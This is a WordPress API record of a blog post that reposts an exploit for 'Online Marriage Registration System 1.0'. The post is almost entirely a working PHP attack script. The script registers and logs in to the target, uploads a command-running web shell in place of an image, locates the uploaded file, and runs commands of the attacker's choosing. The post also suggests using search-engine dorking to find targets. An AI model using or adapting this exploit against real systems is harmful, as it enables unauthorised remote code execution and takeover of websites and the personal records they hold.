{"id":59589,"date":"2024-09-10T22:00:56","date_gmt":"2024-09-10T19:00:56","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/181416\/omrs10-shell.txt"},"modified":"2024-09-10T22:00:56","modified_gmt":"2024-09-10T19:00:56","slug":"online-marriage-registration-system-1-0-shell-upload","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/online-marriage-registration-system-1-0-shell-upload\/","title":{"rendered":"Online Marriage Registration System 1.0 Shell Upload"},"content":{"rendered":"<p>=============================================================================================================================================<br \/>| # Title : Online Marriage Registration System 1.0 php code injection Vulnerability |<br \/>| # Author : indoushka |<br \/>| # Tested on : windows 10 Fr(Pro) \/ browser : Mozilla firefox 130.0.0 (64 bits) |<br \/>| # Vendor : https:\/\/phpgurukul.com\/online-marriage-registration-system-using-php-and-mysql\/ |<br \/>=============================================================================================================================================<\/p>\n<p>poc :<\/p>\n[+] Dorking \u0130n Google Or Other Search Enggine.<\/p>\n[+] This payload inject php code contains a back door.<\/p>\n[+] Line 16 + 19 Set your Target.<\/p>\n[+] save payload as poc.php<\/p>\n[+] usage from cmd : C:\\www\\test&gt;php 1.php -u http:\/\/127.0.0.1\/omrs\/ -c dir<\/p>\n[+] payload :<\/p>\n<p>&lt;?php<br \/>\/\/ Parse command line arguments<br \/>$options = getopt(&#8220;u:c:m:p:&#8221;);<br \/>$url = $options[&#8216;u&#8217;] ?? null;<br \/>$command = $options[&#8216;c&#8217;] ?? null;<br \/>$mobile = $options[&#8216;m&#8217;] ?? null;<br \/>$password = $options[&#8216;p&#8217;] ?? &#8216;inouvis2022&#8217;;<\/p>\n<p>if (!$url || !$command) {<br \/>die(&#8220;Usage: php script.php -u &lt;url&gt; -c &lt;command&gt; \\n&#8221;);<br \/>}<\/p>\n<p>function login($url, $mobile, $password) {<br \/>$loginUrl = &#8220;{$url}\/user\/login.php&#8221;;<\/p>\n<p>$ch = curl_init($loginUrl);<br \/>curl_setopt($ch, CURLOPT_POST, true);<br \/>curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query([<br \/>&#8216;mobno&#8217; =&gt; $mobile,<br \/>&#8216;password&#8217; =&gt; $password,<br \/>&#8216;login&#8217; =&gt; &#8221;<br \/>]));<br \/>curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);<br \/>curl_setopt($ch, CURLOPT_HEADER, true);<br \/>curl_setopt($ch, CURLOPT_COOKIEJAR, &#8216;cookie.txt&#8217;);<br \/>curl_exec($ch);<br \/>curl_close($ch);<\/p>\n<p>\/\/ Extract PHPSESSID from cookie file<br \/>$cookies = file_get_contents(&#8216;cookie.txt&#8217;);<br \/>preg_match(&#8216;\/PHPSESSID=(\\w+);\/&#8217;, $cookies, $matches);<br \/>return $matches[1] ?? null;<br \/>}<\/p>\n<p>function upload($url, $cookie) {<br \/>$uploadUrl = &#8220;{$url}\/user\/marriage-reg-form.php&#8221;;<\/p>\n<p>$fileData = [<br \/>&#8216;husimage&#8217; =&gt; curl_file_create(&#8216;shell.php&#8217;, &#8216;application\/x-php&#8217;, &#8216;&lt;?php $command = shell_exec($_REQUEST[&#8220;cmd&#8221;]); echo $command; ?&gt;&#8217;),<br \/>&#8216;wifeimage&#8217; =&gt; curl_file_create(&#8216;test.jpg&#8217;, &#8216;image\/jpeg&#8217;)<br \/>];<\/p>\n<p>$ch = curl_init($uploadUrl);<br \/>curl_setopt($ch, CURLOPT_POST, true);<br \/>curl_setopt($ch, CURLOPT_POSTFIELDS, $fileData);<br \/>curl_setopt($ch, CURLOPT_COOKIEFILE, &#8216;cookie.txt&#8217;);<br \/>curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);<br \/>curl_exec($ch);<br \/>curl_close($ch);<\/p>\n<p>echo &#8220;[+] PHP shell uploaded\\n&#8221;;<br \/>}<\/p>\n<p>function getRemotePhpFiles($url) {<br \/>$filesUrl = &#8220;{$url}\/&#8221;;<br \/>$ch = curl_init($filesUrl);<br \/>curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);<br \/>$response = curl_exec($ch);<br \/>curl_close($ch);<\/p>\n<p>preg_match_all(&#8216;\/\\d{10,42}\\.php\/&#8217;, $response, $matches);<br \/>return $matches[0];<br \/>}<\/p>\n<p>function execCommand($url, $webshell, $command) {<br \/>$commandUrl = &#8220;{$url}\/user\/{$webshell}?cmd=&#8221; . urlencode($command);<br \/>$ch = curl_init($commandUrl);<br \/>curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);<br \/>$output = curl_exec($ch);<br \/>curl_close($ch);<\/p>\n<p>echo &#8220;[+] Command output\\n&#8221; . $output . &#8220;\\n&#8221;;<br \/>}<\/p>\n<p>function register($mobile, $password, $url) {<br \/>$signupUrl = &#8220;{$url}\/user\/signup.php&#8221;;<\/p>\n<p>$ch = curl_init($signupUrl);<br \/>curl_setopt($ch, CURLOPT_POST, true);<br \/>curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query([<br \/>&#8216;fname&#8217; =&gt; &#8216;indoushka&#8217;,<br \/>&#8216;lname&#8217; =&gt; &#8216;indoushka&#8217;,<br \/>&#8216;mobno&#8217; =&gt; $mobile,<br \/>&#8216;address&#8217; =&gt; &#8216;indoushka&#8217;,<br \/>&#8216;password&#8217; =&gt; $password,<br \/>&#8216;submit&#8217; =&gt; &#8221;<br \/>]));<br \/>curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);<br \/>curl_exec($ch);<br \/>curl_close($ch);<\/p>\n<p>echo &#8220;[+] Registered with mobile phone $mobile and password &#8216;$password&#8217;\\n&#8221;;<br \/>}<\/p>\n<p>$mobile = $mobile ?? strval(rand(100000000, 999999999));<br \/>$password = $password ?? &#8216;inouvis-2022&#8217;;<\/p>\n<p>if ($password === &#8216;inouvis-2022&#8217; || $mobile === null) {<br \/>register($mobile, $password, $url);<br \/>}<\/p>\n<p>$cookie = login($url, $mobile, $password);<br \/>$initialPhpFiles = getRemotePhpFiles($url);<br \/>upload($url, $cookie);<br \/>$finalPhpFiles = getRemotePhpFiles($url);<br \/>$webshell = array_diff($finalPhpFiles, $initialPhpFiles)[0];<br \/>execCommand($url, $webshell, $command);<br \/>?&gt;<\/p>\n<p>Greetings to :============================================================<br \/>jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br \/>==========================================================================<\/p>\n","protected":false},"excerpt":{"rendered":"<p>=============================================================================================================================================| # Title : Online Marriage Registration System 1.0 php code injection Vulnerability || # Author : indoushka || # Tested on : windows 10 Fr(Pro) \/ browser : Mozilla firefox 130.0.0 (64 bits) || # Vendor : https:\/\/phpgurukul.com\/online-marriage-registration-system-using-php-and-mysql\/ |============================================================================================================================================= poc : [+] Dorking \u0130n Google Or Other Search Enggine. [+] This payload inject php &hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-59589","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/59589","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=59589"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/59589\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=59589"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=59589"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=59589"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}